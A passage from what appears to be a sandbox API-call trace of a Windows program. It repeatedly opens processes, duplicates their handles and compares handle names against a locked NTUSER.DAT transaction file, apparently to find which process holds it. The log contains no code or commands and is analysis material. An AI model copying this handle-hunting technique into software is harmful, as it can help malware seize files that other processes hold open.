lpExitCode=0x32ee30) returned 1 [0165.032] CloseHandle (hObject=0x1e4) returned 1 [0165.032] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.032] CloseHandle (hObject=0x194) returned 1 [0165.032] CloseHandle (hObject=0x1e8) returned 1 [0165.032] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8a0) returned 0x1e8 [0165.032] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.032] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.033] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.034] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.034] CloseHandle (hObject=0x1e4) returned 1 [0165.034] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.034] CloseHandle (hObject=0x194) returned 1 [0165.034] CloseHandle (hObject=0x1e8) returned 1 [0165.034] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b0) returned 0x1e8 [0165.034] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.034] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.035] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.036] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.036] CloseHandle (hObject=0x1e4) returned 1 [0165.036] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.036] CloseHandle (hObject=0x194) returned 1 [0165.036] CloseHandle (hObject=0x1e8) returned 1 [0165.036] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b0) returned 0x1e8 [0165.036] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.036] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.037] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.037] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.037] CloseHandle (hObject=0x1e4) returned 1 [0165.038] _wcsicmp (_Str1="\\Internet Explorer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0165.038] CloseHandle (hObject=0x194) returned 1 [0165.038] CloseHandle (hObject=0x1e8) returned 1 [0165.038] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8c0) returned 0x1e8 [0165.038] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.038] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.042] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.046] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.046] CloseHandle (hObject=0x1e4) returned 1 [0165.046] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.046] CloseHandle (hObject=0x194) returned 1 [0165.046] CloseHandle (hObject=0x1e8) returned 1 [0165.046] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8c0) returned 0x1e8 [0165.046] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.046] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.047] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.048] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.048] CloseHandle (hObject=0x1e4) returned 1 [0165.048] _wcsicmp (_Str1="\\Mozilla Maintenance Service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0165.048] CloseHandle (hObject=0x194) returned 1 [0165.048] CloseHandle (hObject=0x1e8) returned 1 [0165.049] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8d0) returned 0x1e8 [0165.049] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.049] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.050] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.050] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.051] CloseHandle (hObject=0x1e4) returned 1 [0165.051] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.051] CloseHandle (hObject=0x194) returned 1 [0165.051] CloseHandle (hObject=0x1e8) returned 1 [0165.051] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8d0) returned 0x1e8 [0165.051] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.051] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.052] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.053] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.053] CloseHandle (hObject=0x1e4) returned 1 [0165.053] _wcsicmp (_Str1="\\Windows Defender", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.053] CloseHandle (hObject=0x194) returned 1 [0165.053] CloseHandle (hObject=0x1e8) returned 1 [0165.053] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8e0) returned 0x1e8 [0165.053] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.053] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.054] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.055] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.055] CloseHandle (hObject=0x1e4) returned 1 [0165.055] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.055] CloseHandle (hObject=0x194) returned 1 [0165.055] CloseHandle (hObject=0x1e8) returned 1 [0165.055] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8e0) returned 0x1e8 [0165.055] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.055] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.056] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.057] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.057] CloseHandle (hObject=0x1e4) returned 1 [0165.057] _wcsicmp (_Str1="\\Windows Media Player", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.057] CloseHandle (hObject=0x194) returned 1 [0165.057] CloseHandle (hObject=0x1e8) returned 1 [0165.057] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8f0) returned 0x1e8 [0165.057] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.057] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.058] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.059] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.059] CloseHandle (hObject=0x1e4) returned 1 [0165.059] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.059] CloseHandle (hObject=0x194) returned 1 [0165.059] CloseHandle (hObject=0x1e8) returned 1 [0165.059] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8f0) returned 0x1e8 [0165.059] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.059] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.060] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.061] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.061] CloseHandle (hObject=0x1e4) returned 1 [0165.061] _wcsicmp (_Str1="\\Mozilla Firefox", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0165.061] CloseHandle (hObject=0x194) returned 1 [0165.061] CloseHandle (hObject=0x1e8) returned 1 [0165.061] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x900) returned 0x1e8 [0165.061] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.061] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.062] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.063] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.063] CloseHandle (hObject=0x1e4) returned 1 [0165.063] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.063] CloseHandle (hObject=0x194) returned 1 [0165.063] CloseHandle (hObject=0x1e8) returned 1 [0165.063] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x900) returned 0x1e8 [0165.063] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.063] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.064] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.064] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.065] CloseHandle (hObject=0x1e4) returned 1 [0165.065] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.065] CloseHandle (hObject=0x194) returned 1 [0165.065] CloseHandle (hObject=0x1e8) returned 1 [0165.065] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x910) returned 0x1e8 [0165.065] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.065] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.066] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.066] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.067] CloseHandle (hObject=0x1e4) returned 1 [0165.067] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.067] CloseHandle (hObject=0x194) returned 1 [0165.067] CloseHandle (hObject=0x1e8) returned 1 [0165.067] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x910) returned 0x1e8 [0165.067] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.067] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.068] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.069] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.069] CloseHandle (hObject=0x1e4) returned 1 [0165.069] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 7 [0165.069] CloseHandle (hObject=0x194) returned 1 [0165.069] CloseHandle (hObject=0x1e8) returned 1 [0165.069] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x920) returned 0x1e8 [0165.069] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.069] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.070] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.071] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.071] CloseHandle (hObject=0x1e4) returned 1 [0165.071] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.071] CloseHandle (hObject=0x194) returned 1 [0165.071] CloseHandle (hObject=0x1e8) returned 1 [0165.071] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x920) returned 0x1e8 [0165.071] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.071] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.072] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.073] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.073] CloseHandle (hObject=0x1e4) returned 1 [0165.073] _wcsicmp (_Str1="\\Microsoft Office", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0165.073] CloseHandle (hObject=0x194) returned 1 [0165.073] CloseHandle (hObject=0x1e8) returned 1 [0165.073] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x930) returned 0x1e8 [0165.073] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.073] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.074] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.075] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.075] CloseHandle (hObject=0x1e4) returned 1 [0165.075] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.075] CloseHandle (hObject=0x194) returned 1 [0165.075] CloseHandle (hObject=0x1e8) returned 1 [0165.075] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x930) returned 0x1e8 [0165.075] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.075] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.076] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.077] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.077] CloseHandle (hObject=0x1e4) returned 1 [0165.077] _wcsicmp (_Str1="\\Microsoft Analysis Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0165.077] CloseHandle (hObject=0x194) returned 1 [0165.077] CloseHandle (hObject=0x1e8) returned 1 [0165.077] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x940) returned 0x1e8 [0165.077] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.077] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.078] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.079] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.079] CloseHandle (hObject=0x1e4) returned 1 [0165.079] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.079] CloseHandle (hObject=0x194) returned 1 [0165.079] CloseHandle (hObject=0x1e8) returned 1 [0165.079] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x940) returned 0x1e8 [0165.079] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.079] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.083] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.088] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.088] CloseHandle (hObject=0x1e4) returned 1 [0165.088] _wcsicmp (_Str1="\\Windows Sidebar", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.088] CloseHandle (hObject=0x194) returned 1 [0165.088] CloseHandle (hObject=0x1e8) returned 1 [0165.088] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x950) returned 0x1e8 [0165.088] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.088] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.092] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.098] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.098] CloseHandle (hObject=0x1e4) returned 1 [0165.099] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.099] CloseHandle (hObject=0x194) returned 1 [0165.099] CloseHandle (hObject=0x1e8) returned 1 [0165.099] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x950) returned 0x1e8 [0165.099] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.099] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.100] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.101] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.101] CloseHandle (hObject=0x1e4) returned 1 [0165.101] _wcsicmp (_Str1="\\Windows Journal", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.101] CloseHandle (hObject=0x194) returned 1 [0165.101] CloseHandle (hObject=0x1e8) returned 1 [0165.102] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x960) returned 0x1e8 [0165.102] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.102] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.106] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.106] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.106] CloseHandle (hObject=0x1e4) returned 1 [0165.107] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.107] CloseHandle (hObject=0x194) returned 1 [0165.107] CloseHandle (hObject=0x1e8) returned 1 [0165.107] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x960) returned 0x1e8 [0165.107] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: 